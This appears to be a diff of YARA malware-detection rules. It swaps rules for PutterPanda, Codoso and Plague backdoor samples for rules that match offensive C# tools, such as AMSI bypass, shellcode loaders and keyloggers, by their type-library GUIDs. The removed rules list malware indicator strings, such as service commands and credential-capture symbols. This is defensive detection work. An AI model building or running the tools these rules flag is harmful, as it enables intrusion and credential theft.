 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8054195f212017fb17953728a7df34645d81c93fee75300e44f467c6aa5efaff"
+		logic_hash = "8b7315970124c7997ca7d7d21e6c26ac9c905cdbc1ee009f7800b6bc98f9c3d4"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		super_rule = 1
-		hash0 = "bf1d385e637326a63c4d2f253dc211e6a5436b6a"
-		hash1 = "76459bcbe072f9c29bb9703bc72c7cd46a692796"
-		hash2 = "e105a7a3a011275002aec4b930c722e6a7ef52ad"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%s%duserid=%dthreadid=%dgroupid=%d" fullword ascii
-		$s2 = "ssdpsvc.dll" fullword ascii
-		$s3 = "Fail %s " fullword ascii
-		$s4 = "%s%dpara1=%dpara2=%dpara3=%d" fullword ascii
-		$s5 = "LsaServiceInit" fullword ascii
-		$s6 = "%-8d Fs %-12s Bs " fullword ascii
-		$s7 = "Microsoft DH SChannel Cryptographic Provider" fullword ascii
+		$typelibguid0lo = "95359279-5cfa-46f6-b400-e80542a7336a" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 5 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Malware_Msupdater_String_In_EXE : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Httpsbeaconshell : FILE
 {
 	meta:
-		description = "MSUpdater String in Executable"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c7da9e1e-3a8d-54b6-b102-0e1095d99cc4"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L133-L156"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d66e3566-6082-570a-a168-f44c9d8c7619"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/limbenjamin/HTTPSBeaconShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L573-L586"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b1a2043b7658af4d4c9395fa77fde18ccaf549bb"
-		logic_hash = "2b7a43aee6dbac1bfa7d9e0331cb078394ae78a1ec44c1a4a70a63b38595abe0"
-		score = 50
+		logic_hash = "4e51832b9a5f7b82da2f11bcb34664b0a8d0308b0e823436f4339233c07213b3"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "msupdate.exe" fullword wide
-		$x3 = "msupdater.exe" fullword ascii
-		$x4 = "msupdater32.exe" fullword ascii
-		$x5 = "msupdater32.exe" fullword wide
-		$x6 = "msupdate.pif" fullword ascii
-		$fp1 = "_msupdate_" wide
-		$fp2 = "_msupdate_" ascii
-		$fp3 = "/kies" wide
+		$typelibguid0lo = "aca853dc-9e74-4175-8170-e85372d5f2a9" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) ) and not ( 1 of ( $fp* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_Msupdater_3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Amsiscanbufferbypass : FILE
 {
 	meta:
-		description = "Detects Malware related to PutterPanda - MSUpdater"
-		author = "Florian Roth (Nextron Systems)"
-		id = "917ab081-ee91-5eda-82eb-4731563a1933"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L158-L175"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "12a15e61-30fb-50a3-a59b-39f9871444f0"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/rasta-mouse/AmsiScanBufferBypass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L588-L601"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "464149ff23f9c7f4ab2f5cadb76a4f41f969bed0"
-		logic_hash = "09e7da7f2bfbae9252502ea1ea61b612c1af2e4c70508b34e685b46429d4613c"
-		score = 70
+		logic_hash = "227b9878e11d1e14aa216cc9d46364cff727b1443f4c18f083971be8dd5e603c"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "msupdater.exe" fullword ascii
-		$s1 = "Explorer.exe \"" fullword ascii
-		$s2 = "FAVORITES.DAT" fullword ascii
-		$s4 = "COMSPEC" fullword ascii
+		$typelibguid0lo = "431ef2d9-5cca-41d3-87ba-c7f5e4582dd2" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_Msupdater_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Shellcodeloader : FILE
 {
 	meta:
-		description = "Detects Malware related to PutterPanda - MSUpdater"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3c65b668-52c2-5cd5-ba02-4f190e08d46c"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L177-L200"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b8787dac-48a3-5711-86ba-0fda86b6224e"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/Hzllaga/ShellcodeLoader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L603-L616"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b55072b67543f58c096571c841a560c53d72f01a"
-		logic_hash = "038be28609df0187cbbce0d16fee7c902b742458f1201ff3c0d5fde19acd2c56"
-		score = 70
+		logic_hash = "3461e21a0a0661be9830023d56ecdd0434ab9f32328118ad87b2216061851127"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$x0 = "msupdate.exe" fullword wide
-		$x1 = "msupdate" fullword wide
-		$s1 = "Microsoft Corporation. All rights reserved." fullword wide
-		$s2 = "Automatic Updates" fullword wide
-		$s3 = "VirtualProtectEx" fullword ascii
-		$s4 = "Invalid parameter" fullword ascii
-		$s5 = "VirtualAllocEx" fullword ascii
-		$s6 = "WriteProcessMemory" fullword ascii
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$typelibguid0lo = "a48fe0e1-30de-46a6-985a-3f2de3c8ac96" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) and 4 of ( $s* ) ) or ( 1 of ( $x* ) and all of ( $s* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_Msupdater_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Keystrokeapi : FILE
 {
 	meta:
-		description = "Detects Malware related to PutterPanda - MSUpdater"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e9188a14-5c0c-551c-bdca-9f770f42935a"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L202-L236"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e715bce8-531b-5e2a-bd02-b2fc4990c499"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/fabriciorissetto/KeystrokeAPI"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L618-L632"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "365b5537e3495f8ecfabe2597399b1f1226879b1"
-		logic_hash = "47d75e589d47a39d5a9c9e0047a143074d3d74b5541adf8cb3be968da732a96d"
-		score = 70
-		quality = 83
+		logic_hash = "36690992d1e5f3df52ad3a3fc218335ee78ce5e1bf7433fa769c8ee618f00b9e"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "winsta0\\default" fullword ascii
-		$s1 = "EXPLORER.EXE" fullword ascii
-		$s2 = "WNetEnumResourceA" fullword ascii
-		$s3 = "explorer.exe" fullword ascii
-		$s4 = "CreateProcessAsUserA" fullword ascii
-		$s5 = "HttpSendRequestExA" fullword ascii
-		$s6 = "HttpEndRequestA" fullword ascii
-		$s7 = "GetModuleBaseNameA" fullword ascii
-		$s8 = "GetModuleFileNameExA" fullword ascii
-		$s9 = "HttpSendRequestA" fullword ascii
-		$s10 = "HttpOpenRequestA" fullword ascii
-		$s11 = "InternetConnectA" fullword ascii
-		$s12 = "Process32Next" fullword ascii
-		$s13 = "Process32First" fullword ascii
-		$s14 = "CreatePipe" fullword ascii
-		$s15 = "EnumProcesses" fullword ascii
-		$s16 = "LookupPrivilegeValueA" fullword ascii
-		$s17 = "PeekNamedPipe" fullword ascii
-		$s18 = "EnumProcessModules" fullword ascii
-		$s19 = "PSAPI.DLL" fullword ascii
-		$s20 = "SPSSSQ" fullword ascii
+		$typelibguid0lo = "f6fec17e-e22d-4149-a8a8-9f64c3c905d3" ascii wide
+		$typelibguid1lo = "b7aa4e23-39a4-49d5-859a-083c789bfea2" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 220KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_Gen4 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Shellcoderunner : FILE
 {
 	meta:
-		description = "Detects Malware related to PutterPanda"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0b6ce725-6932-5432-acd5-ee3593ac7bd8"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L238-L276"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "949364e7-dcb6-5afd-ade9-cc34a6e15e97"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/antman1p/ShellCodeRunner"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L634-L648"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7d450935febe5d6db14be1e7694db1d7b9e8fcacf013920e89c7b25659254310"
-		score = 70
+		logic_hash = "fecb1562fe42fa512ab3dd932019fa9ba2c09d574e909361c3af9e190cd5db17"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "71a8378fa8e06bcf8ee9f019c807c6bfc58dca0c"
-		hash1 = "8fdd6e5ed9d69d560b6fdd5910f80e0914893552"
-		hash2 = "3c4a762175326b37035a9192a981f7f4cc2aa5f0"
-		hash3 = "598430b3a9b5576f03cc4aed6dc2cd8a43324e1e"
-		hash4 = "6522b81b38747f4aa09c98fdaedaed4b00b21689"
 
 	strings:
-		$x1 = "rz.dat" fullword ascii
-		$s0 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii
-		$s1 = "Internet connect error:%d" fullword ascii
-		$s2 = "Proxy-Authorization:Basic " fullword ascii
-		$s5 = "Invalid url" fullword ascii
-		$s6 = "Create file failed" fullword ascii
-		$s7 = "myAgent" fullword ascii
-		$z1 = "%s%s%d%d" fullword ascii
-		$z2 = "HttpQueryInfo failed:%d" fullword ascii
-		$z3 = "read file error:%d" fullword ascii
-		$z4 = "down file success" fullword ascii
-		$z5 = "kPStoreCreateInstance" fullword ascii
-		$z6 = "Avaliable data:%u bytes" fullword ascii
-		$z7 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" fullword ascii
+		$typelibguid0lo = "634874b7-bf85-400c-82f0-7f3b4659549a" ascii wide
+		$typelibguid1lo = "2f9c3053-077f-45f2-b207-87c3c7b8f054" ascii wide
 
 	condition:
-		filesize < 300KB and ( ( uint16( 0 ) == 0x5a4d and $x1 and 3 of ( $s* ) ) or ( 3 of ( $s* ) and 4 of ( $z* ) ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_MAL_LNX_PLAGUE_BACKDOOR_Jul25 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Offensivecsharp : FILE
 {
 	meta:
-		description = "Detects Plague backdoor ELF binaries, related to PAM authentication alteration."
-		author = "Pezier Pierre-Henri"
-		id = "3b59adb4-91b4-56d1-875e-60de130ae11f"
-		date = "2025-07-25"
-		modified = "2025-09-17"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_plague.yar#L1-L28"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "339f6858-6076-5320-ba5f-2903e642ea42"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/diljith369/OffensiveCSharp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L650-L674"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "14b0c90a2eff6b94b9c5160875fcf29aff15dcfdfd3402d953441d9b0dca8b39"
-		hash = "7c3ada3f63a32f4727c62067d13e40bcb9aa9cbec8fb7e99a319931fc5a9332e"
-		logic_hash = "9ef7d8153c8567f85b8713467bf5b175e0c2af050e1f275fb2441bbca8d20a79"
-		score = 80
+		logic_hash = "64beb345845aeb7083a2c35d94fa433e95dd810b82c0cf392dd5e3de3bb5b110"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "decrypt_phrase"
-		$s2 = "init_phrases"
-		$x1 = "captured_password"
-		$x2 = "updateklog"
-		$x3 = "init_cred_structs"
-		$xop1 = {
-         48 8b [4] 00    // mov     rax, cs:_ent_ptr
-         8b 00           // mov     eax, [rax]
-         3d ca b2 e9 f1  // cmp     eax, 0F1E9B2CAh
-         74              // jz      short loc_4586
-      }
+		$typelibguid0lo = "6c3fbc65-b673-40f0-b1ac-20636df01a85" ascii wide
+		$typelibguid1lo = "2bad9d69-ada9-4f1e-b838-9567e1503e93" ascii wide
+		$typelibguid2lo = "512015de-a70f-4887-8eae-e500fd2898ab" ascii wide
+		$typelibguid3lo = "1ee4188c-24ac-4478-b892-36b1029a13b3" ascii wide
+		$typelibguid4lo = "5c6b7361-f9ab-41dc-bfa0-ed5d4b0032a8" ascii wide
+		$typelibguid5lo = "048a6559-d4d3-4ad8-af0f-b7f72b212e90" ascii wide
+		$typelibguid6lo = "3412fbe9-19d3-41d8-9ad2-6461fcb394dc" ascii wide
+		$typelibguid7lo = "9ea4e0dc-9723-4d93-85bb-a4fcab0ad210" ascii wide
+		$typelibguid8lo = "6d2b239c-ba1e-43ec-8334-d67d52b77181" ascii wide
+		$typelibguid9lo = "42e8b9e1-0cf4-46ae-b573-9d0563e41238" ascii wide
+		$typelibguid10lo = "0d15e0e3-bcfd-4a85-adcd-0e751dab4dd6" ascii wide
+		$typelibguid11lo = "644dfd1a-fda5-4948-83c2-8d3b5eda143a" ascii wide
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_Plugx_3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_SHAPESHIFTER : FILE
 {
 	meta:
-		description = "Detects Codoso APT PlugX Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "55066812-3a8e-5099-afb4-ff7a59f1ccb2"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L11-L27"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8903c65a-624f-5e8d-a3f6-4572b56bd2f7"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/matterpreter/SHAPESHIFTER"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L676-L689"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3"
-		logic_hash = "51615c2583bb672f148f216e4856e7e346b17884f0740d69f6a24f08b594bda4"
+		logic_hash = "87804b4f657dd838e969e41320d08455470611688f1624632df03868d204490d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
-		$s2 = "mcs.exe" fullword ascii
-		$s3 = "McAltLib.dll" fullword ascii
-		$s4 = "WinRAR self-extracting archive" fullword wide
+		$typelibguid0lo = "a3ddfcaa-66e7-44fd-ad48-9d80d1651228" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1200KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_Plugx_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Evasor : FILE
 {
 	meta:
-		description = "Detects Codoso APT PlugX Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0402a0ff-5664-52db-a739-51c5181853f8"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L28-L45"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "457959ed-3e90-52c7-89f9-e1b17b35260e"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/cyberark/Evasor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L691-L704"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b9510e4484fa7e3034228337768176fce822162ad819539c6ca3631deac043eb"
-		logic_hash = "5ee652a135d4865340d2ce6421144ec76ccc7ab69704e92904b2e2ebfc72edfc"
+		logic_hash = "883dcb8214c036d4a81ee09f97f206f19f24c6a6526437ba61145cb01cb2b1ba"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%TEMP%\\HID" fullword wide
-		$s2 = "%s\\hid.dll" fullword wide
-		$s3 = "%s\\SOUNDMAN.exe" fullword wide
-		$s4 = "\"%s\\SOUNDMAN.exe\" %d %d" fullword wide
-		$s5 = "%s\\HID.dllx" fullword wide
+		$typelibguid0lo = "1c8849ef-ad09-4727-bf81-1f777bd1aef8" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them ) or all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_Customtcp_4 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Stracciatella : FILE
 {
 	meta:
-		description = "Detects Codoso APT CustomTCP Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L46-L71"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5b1a8102-6d59-5f2f-8ae2-b3c1f75a561d"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/mgeeky/Stracciatella"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L706-L719"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fcabbd37acf75e1233894682e77abad95a849ed68c7e8ce2690dde03d8160f8b"
+		logic_hash = "ca28e325cd98f2c9793c434dfd57404e17ed80e57023095d877993a01ee718ee"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ea67d76e9d2e9ce3a8e5f80ff9be8f17b2cd5b1212153fdf36833497d9c060c0"
-		hash2 = "130abb54112dd47284fdb169ff276f61f2b69d80ac0a9eac52200506f147b5f8"
-		hash3 = "3ea6b2b51050fe7c07e2cf9fa232de6a602aa5eff66a2e997b25785f7cf50daa"
-		hash4 = "02cf5c244aebaca6195f45029c1e37b22495609be7bdfcfcd79b0c91eac44a13"
 
 	strings:
-		$x1 = "varus_service_x86.dll" fullword ascii
-		$s1 = "/s %s /p %d /st %d /rt %d" fullword ascii
-		$s2 = "net start %%1" fullword ascii
-		$s3 = "ping 127.1 > nul" fullword ascii
-		$s4 = "McInitMISPAlertEx" fullword ascii
-		$s5 = "sc start %%1" fullword ascii
-		$s6 = "net stop %%1" fullword ascii
-		$s7 = "WorkerRun" fullword ascii
+		$typelibguid0lo = "eaafa0ac-e464-4fc4-9713-48aa9a6716fb" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 5 of them ) or ( $x1 and 2 of ( $s* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_Customtcp_3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Logger : FILE
 {
 	meta:
-		description = "Detects Codoso APT CustomTCP Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L72-L93"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "82937fef-8280-5bc6-af4a-55c5cb3a7553"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/xxczaki/logger"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L721-L734"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d66106ec2e743dae1d71b60a602ca713b93077f56a47045f4fc9143aa3957090"
-		logic_hash = "fb486985587fc28c45cbdf6a63550e60e8d6c18f218544adc19c5604193fe8ea"
+		logic_hash = "bf77dcb7fccad566e998df42e9a8248a117a8636500b80fe885d756cfa999f37"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "DnsApi.dll" fullword ascii
-		$s2 = "softWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\%s" ascii
-		$s3 = "CONNECT %s:%d hTTP/1.1" ascii
-		$s4 = "CONNECT %s:%d HTTp/1.1" ascii
-		$s5 = "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0;)" ascii
-		$s6 = "iphlpapi.dll" ascii
-		$s7 = "%systemroot%\\Web\\" ascii
-		$s8 = "Proxy-Authorization: Negotiate %s" ascii
-		$s9 = "CLSID\\{%s}\\InprocServer32" ascii
+		$typelibguid0lo = "9e92a883-3c8b-4572-a73e-bb3e61cfdc16" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 5 of them ) or 7 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_Customtcp_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Internal_Monologue : FILE
 {
 	meta:
-		description = "Detects Codoso APT CustomTCP Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L94-L114"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ce2773a2-b0b7-560e-ba21-3f018ddcacb3"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/eladshamir/Internal-Monologue"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L736-L750"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3577845d71ae995762d4a8f43b21ada49d809f95c127b770aff00ae0b64264a3"
-		logic_hash = "a355ac60dca5ca880a90a5c2720690b4691630fd434411758fa7ff006f7389ba"
+		logic_hash = "983273ebcba36e8a22d5bda8bdbba0e1fb31fb128a76a7b39aa012bc83873aff"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "varus_service_x86.dll" fullword ascii
-		$s2 = "/s %s /p %d /st %d /rt %d" fullword ascii
-		$s3 = "net start %%1" fullword ascii
-		$s4 = "ping 127.1 > nul" fullword ascii
-		$s5 = "McInitMISPAlertEx" fullword ascii
-		$s6 = "sc start %%1" fullword ascii
-		$s7 = "B_WKNDNSK^" fullword ascii
-		$s8 = "net stop %%1" fullword ascii
+		$typelibguid0lo = "0c0333db-8f00-4b68-b1db-18a9cacc1486" ascii wide
+		$typelibguid1lo = "84701ace-c584-4886-a3cf-76c57f6e801a" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 406KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_PGV_PVID_6 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_GRAT2 : FILE
 {
 	meta:
